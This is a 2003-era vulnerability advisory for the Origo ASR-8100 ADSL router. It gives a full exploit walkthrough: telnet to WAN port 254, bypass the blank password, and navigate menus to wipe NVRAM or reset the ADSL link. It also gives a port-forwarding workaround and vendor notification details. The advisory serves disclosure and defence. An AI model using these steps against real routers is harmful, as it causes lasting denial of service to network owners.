Vulnerable device
-----------------
Origo ASR-8100 ADSL router
Firmware ETHADSL_USB_110502_REL10_S
Customer Software Version 110502_REL10_S
ADSL Showtime Firmware Version: 3.21
device based on Conexant CX82310-14 chipset
Vulnerability: Remote ADSL reset and permanent denial of service attack
-----------------------------------------------------------------------
The following device is able to be remotely reset to factory settings,
allowing a permanent denial of service attack until reconfigured manually by
an operator. The attack only takes place after the device is reset - which
may be some time after it has been performed. PPP authentication
information
is lost on reset to factory settings, so it is most likely that the device
will be unable to establish a WAN link after reset.
The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP
is used) its IP address to be changed.
Attack overview
---------------
A telnet-style configuration interface is left open to WAN interface on port
254, without a password being set. This menu system is very easily driven
by
a remote attacker.
A full exploit is given below.
Workaround
----------
Forwarding external port 254 to an internal port that is unused prevents
access to the configuration interface.
With the web configuration interface at http://router-ip/doc/advance.htm
click on Configuration: Virtual server
Enter a new entry:
Public port: 254
Private port: 9876
TCP
Host IP address: 127.0.0.1
Click 'Add this setting', then do Configuration: Save Settings/Reboot and
click 'Save & Reboot'
Exploit details
---------------
From any Internet connected host:
telnet <router global IP address> 254
Returns a menu:
01/01/99 CONEXANT SYSTEMS, INC.
00:04:10
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21
You are prompted for a LOGIN PASSWORD>
Just press return
Brings up MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
4. REMOTE LOGON
Press 1 - get to SYSTEM STATUS AND CONFIGURATION
1. SYSTEM INFORMATION
2. SYSTEM CONFIGURATION
Press 2 - get to SYSTEM CONFIGURATION
1. CHANGE SYSTEM TIME
2. CHANGE SYSTEM DATE
3. CHANGE PASSWORD
4. FACTORY DEFAULT CONFIGURATION
Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't seem to work)
Type 4: Prompt: This will reset all the configurations and the ADSL modem.
Are you sure?(Y/N)
Type Y: Message: NVRAM updated
This does not reset the ADSL modem, only clears the NVRAM. This takes
effect
the next time the modem is reset: the admin password is reset to that
printed
in the documentation, and the ADSL username/password are reset, meaning the
connection is down permanently until a human sets them up again. Any other
settings (security etc) are also lost.
From main menu, type 2 to get to ADSL MENU
1. ADSL PERFORMANCE STATUS
2. 24 HOUR ADSL PERFORMANCE HISTORY
3. 7 DAY ADSL PERFORMANCE HISTORY
4. ADSL ALARM HISTORY
5. ADSL TRANSCEIVER CONFIGURATION MENU
6. ADSL LINK RESET
Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y. The ADSL link is reset and a new WAN IP address is requested by
DHCP (if the ISP uses it).
Vendor notification
-------------------
UK support for Vendor (support (at) adsltech (dot) com [email concealed]) was notified on 30th August
2003 - entirety of reply message was 'Thanks a lot'. Vendor doesn't
advertise an email address so were notified via web form on that date - no
response received. To date the vendor has not advertised any patches or new
firmware.
--
Theo Markettos theo (at) markettos.org (dot) uk [email concealed]
Clare Hall, Cambridge theom (at) chiark.greenend.org (dot) uk [email concealed]
CB3 9AL, UK http://www.markettos.org.uk/